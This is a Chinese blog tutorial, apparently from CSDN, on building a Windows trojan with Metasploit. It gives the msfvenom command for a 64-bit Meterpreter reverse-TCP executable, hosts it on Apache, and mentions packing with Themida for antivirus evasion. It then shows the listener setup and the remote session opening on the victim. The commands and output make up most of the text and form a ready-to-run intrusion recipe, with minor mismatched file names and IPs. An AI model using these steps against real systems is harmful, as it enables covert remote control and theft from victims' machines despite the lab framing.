【网络安全】 MSF生成木马教程

本文章仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。

环境准备:

名称系统位数IP
攻击机Kali Linux6410.3.0.231
客户端Windows 76410.3.0.234
一、生成木马 

1、在Kali机器上面生成木马,注意这里是64位的木马

msfvenom -p windows/x64/meterpreter/reverse_tcp -b '\x00\x0b' -f exe lhost=10.3.0.231 lport=9999 -o /var/www/html/shellx64.exe

2、启动Apache,方便客户端下载

service apache2 start

3、免杀加壳:本例用的是 Themida

二、Kali 开启监听

1、开启MSF

┌──(root㉿Kali)-[~]
└─# msfconsole

2、使用监听模块

msf6 > use exploit/multi/handler

# 输出
[*] Using configured payload generic/shell_reverse_tcp

2、设置Payload

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

# 输出
payload => windows/x64/meterpreter/reverse_tcp

 3、设置监听IP

msf6 exploit(multi/handler) > set lhost 10.3.0.231

# 输出
lhost => 10.3.0.231

4、设置监听端口

msf6 exploit(multi/handler) > set lport 9999

# 输出
lport => 9999

 5、运行

msf6 exploit(multi/handler) > run

# 输出
[*] Started reverse TCP handler on 10.3.0.231:9999
三、客户端运行

1、模拟下载木马 

http://10.3.0.231/shell.exe

2、点击运行木马

四、获取权限

1、当出现 meterpreter,表示成功入侵

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.3.0.231:9999 
[*] Sending stage (175686 bytes) to 10.3.0.227
[*] Meterpreter session 1 opened (10.3.0.231:9999 -> 10.3.0.227:58484) at 2024-03-13 14:02:01 +0800

meterpreter > 

2、查看权限,当客户机是普通用户登录的话,此时获取到的就是一个普通 user 权限

meterpreter > getuid

# 输出
Server username: tomma-PC\tomma
  • 8
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值